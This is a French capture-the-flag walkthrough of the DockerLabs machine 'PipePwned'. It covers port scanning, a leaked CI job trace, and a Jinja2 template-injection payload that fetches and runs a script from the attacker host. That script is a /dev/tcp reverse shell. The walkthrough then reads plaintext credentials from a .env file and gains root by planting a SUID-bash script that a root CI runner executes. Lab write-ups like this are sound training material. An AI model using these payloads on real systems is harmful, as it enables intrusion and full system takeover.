PipePwned

PipePwned



**** Adresse IP cible

┌──(d4fl0n㉿kali)-[~/dockerlabs]
└─$ sudo ./auto_deploy.sh pipepwned.tar
[sudo] password for d4fl0n: 

                     ##        .         
               ## ## ##       ==         
            ## ## ## ##      ===         
        /""""""""""""""""\___/ ===       
   ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~
        \______ o          __/           
          \    \        __/            
           \____\______/               
                                          
  ___  ____ ____ _  _ ____ ____ _    ____ ___  ____ 
  |  \ |  | |    |_/  |___ |__/ |    |__| |__] [__  
  |__/ |__| |___ | \_ |___ |  \ |___ |  | |__] ___] 
                                         
         

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

**** numérisation des ports

┌──(d4fl0n㉿kali)-[~]
└─$ nmap -p- 172.17.0.2                      
Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-14 12:48 -0400
Nmap scan report for trailpack.es (172.17.0.2)
Host is up (0.0000050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 86:E8:41:4A:AB:55 (Unknown)
┌──(d4fl0n㉿kali)-[~]
└─$ nmap -p 22,80 -A -O -sCV 172.17.0.2
Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-14 12:49 -0400
Nmap scan report for trailpack.es (172.17.0.2)
Host is up (0.00017s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.16 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 d4:18:2e:bc:1e:06:58:73:24:7d:cd:f8:74:b3:72:41 (ECDSA)
|_  256 e6:a8:6b:06:d9:65:cd:48:ed:cf:b2:11:f1:ab:ba:3e (ED25519)
80/tcp open  http    Gunicorn
|_http-title: MASoftware \xC2\xB7 CI/CD Console
|_http-server-header: gunicorn
MAC Address: 86:E8:41:4A:AB:55 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 6.18 (94%), Android 11 (Linux 4.9) (93%), Android 12 (Linux 5.4) (93%), Linux 3.8 (93%), Android 10 - 12 (Linux 4.14 - 4.19) (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), OpenWrt 21.02 (Linux 5.4) (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

**** énumération ssh

┌──(d4fl0n㉿kali)-[~]
└─$ ssh 172.17.0.2   
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is: SHA256:K1S75OJ7TZ5z0QRgEvIYhtdFcMWKf/EmfZu20bfqUuc
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
d4fl0n@172.17.0.2's password: 

**** la connexion au ssh par mot de passe est autoriser

**** énumération web

Pasted image 20260814180508.png

┌──(d4fl0n㉿kali)-[~]
└─$ dirsearch -u http://172.17.0.2/         

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/d4fl0n/reports/http_172.17.0.2/__26-08-14_12-54-53.txt

Target: http://172.17.0.2/

[12:54:53] Starting: 
[12:56:00] 200 -    3B  - /health

Task Completed

**** nous n'avons rien trouver d'intéressent après le brute force, mais y'a une échec de déploiement d'un projet CI/CD qui nous divulgue des information intéressent

┌──(d4fl0n㉿kali)-[~]
└─$ curl http://172.17.0.2/api/jobs/126/trace
Running with gitlab-runner (shell executor) on self-hosted-01
$ echo "Deploying $CI_PROJECT_NAME on runner $CI_RUNNER_DESCRIPTION"
Deploying payments-api on runner self-hosted-01
$ env | grep -iE 'ci_|builds'    # TODO: remove debug
CI_REGISTRY=registry.masoftware.dl
CI_RUNNER_SHELL=/bin/bash
CI_JOB_STAGE=deploy
CI_BUILDS_DIR=/opt/ci/builds
CI_RUNNER_TOKEN=glrt-9ef2bb338750bea3f20e
$ id    # runner runs each job under its own user
uid=0(root) gid=0(root) groups=0(root)
$ ./deploy.sh
bash: ./deploy.sh: No such file or directory
Job failed: exit code 127

**** nous avons trouver un faille SSTI dans le champs ref

┌──(d4fl0n㉿kali)-[~/dockerlabs]
└─$ curl 'http://172.17.0.2/pipelines/new' \      
  -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Referer: http://172.17.0.2/' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: http://172.17.0.2' \
  -H 'Connection: keep-alive' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Priority: u=0, i' \
  --data-raw 'name=deploy-manual&ref=name%3D%7B%7B7*7%7D%7D'
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>MASoftware · CI/CD Console</title>
    <link rel="stylesheet" href="/static/style.css">
</head>
<body>
<header>
    <div class="logo">MASoftware</div>
    <nav><span>Self-hosted CI/CD Console</span><span class="env">runner: self-hosted-01</span></nav>
</header>
<main>
    
<h1>Pipeline Result</h1>
<section class="card">
    <p class="banner">Pipeline <strong>deploy-manual</strong> sent to queue for ref <code>name=49</code> on runner <em>self-hosted-01</em>.</p>
    <p class="muted">Target Ref: <code>name={{7*7}}</code></p>
    <a href="/">← back to dashboard</a>
</section>

</main>
<footer><span>MASoftware DevOps · console v1.0 · gitlab-runner (shell executor)</span></footer>
</body>
</html>

Pasted image 20260814190632.png

**** nous allons déterminer le Template

Pasted image 20260814190737.png

**** il s'agit probablement du Template jinja2 ou twig

Pasted image 20260814190859.png

**** nous avons la permission de l'utilisateur ciapp

**** reverse shell

┌──(d4fl0n㉿kali)-[~]
└─$ cat shell 
#!/bin/bash

/usr/bin/bash -i >& /dev/tcp/172.17.0.1/4444 0>&1

***payload

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl http://172.17.0.1/shell | bash').read() }}
ciapp@ca3a8dd44554:/opt/app$ id
uid=1000(ciapp) gid=1000(ciapp) groups=1000(ciapp)
ciapp@ca3a8dd44554:/opt/app$ 

**** escalade de privilèges

**** énumérons les utilisateurs system

ciapp@ca3a8dd44554:~$ getent passwd | grep -i bash
root:x:0:0:root:/root:/bin/bash
ciapp:x:1000:1000::/home/ciapp:/bin/bash
devops:x:1001:1001::/home/devops:/bin/bash
ciapp@ca3a8dd44554:~$ 

**** énumérons les fichier system

ciapp@ca3a8dd44554:/opt/ci$ ls -la
total 28
drwxr-xr-x 1 root  root   4096 Aug  8 18:40 .
drwxr-xr-x 1 root  root   4096 Aug  8 18:40 ..
-rw-r----- 1 ciapp ciapp   189 Jul 18 20:04 .env
drwxrwsr-x 1 root  devops 4096 Aug 14 17:45 builds
-rwx--x--x 1 root  root    813 Jul 18 19:12 runner.sh
ciapp@ca3a8dd44554:/opt/ci$ cat .env
# Runner base config: /etc/gitlab-runner/config.toml
CI_REGISTRY=registry.masoftware.dl
CI_RUNNER_TOKEN=glrt-9ef2bb338750bea3f20e

DEVOPS_SSH_USER=devops
DEVOPS_SSH_PASS=MAS0ftware_202607!

**** nous avons trouver le fichier .env qui contient les identifiant de connexion de l'utilisateur devops, essayons de se connecter a son compte

ciapp@ca3a8dd44554:/opt/ci$ su devops
Password: 
devops@ca3a8dd44554:/opt/ci$ id
uid=1001(devops) gid=1001(devops) groups=1001(devops)
devops@ca3a8dd44554:/opt/ci$ 

**** nous somme maintenant connecter entant que devops

**** nous allons lire le fichier de configuration gitlab-runner

ciapp@ca3a8dd44554:/opt/ci$ cat /etc/gitlab-runner/config.toml
concurrent = 1
check_interval = 20
log_level = "info"

[session_server]
session_timeout = 1800

[[runners]]
name = "self-hosted-01"
url = "https://gitlab.masoftware.dl/"
id = 1
token = "glrt-9ef2bb338750bea3f20e"
executor = "shell"
# Script gets executed with the privileges of the user running the runner service
builds_dir = "/opt/ci/builds"
environment_file = "/opt/ci/.env"

# TODO: service runs as root, migrate to a non-root user

**** nous allons un fenêtre d'intervalle de 20 second pour exécuter et supprimer notre script de un dossier /opt/ci/builds, vérifions la permission d'écriture pour le priv root

ciapp@ca3a8dd44554:/opt/ci$ ls -la
total 28
drwxr-xr-x 1 root  root   4096 Aug  8 18:40 .
drwxr-xr-x 1 root  root   4096 Aug  8 18:40 ..
-rw-r----- 1 ciapp ciapp   189 Jul 18 20:04 .env
drwxrwsr-x 1 root  devops 4096 Aug 14 19:24 builds

**** nous avons la permission d'écriture, créons notre script

devops@ca3a8dd44554:/opt/ci/builds$ echo 'chmod +s /bin/bash' > deploy.sh && chmod +x deploy.sh
devops@ca3a8dd44554:/opt/ci/builds$ ls
deploy.sh
devops@ca3a8dd44554:/opt/ci/builds$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14  2024 /bin/bash
devops@ca3a8dd44554:/opt/ci/builds$ 

**** root

devops@ca3a8dd44554:/opt/ci/builds$ /bin/bash -p
bash-5.1# id
uid=1001(devops) gid=1001(devops) euid=0(root) egid=0(root) groups=0(root),1001(devops)
bash-5.1# 

**** flag

bash-5.1# cat /home/devops/user_flag.txt /root/root_flag.txt 
30e3108dbbf867259a30a459770dd25c
cff89c3a4ea6977b2213c344a4a84650
bash-5.1# 
root@ca3a8dd44554:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
ca3a8dd44554
root@ca3a8dd44554:~#


Report Page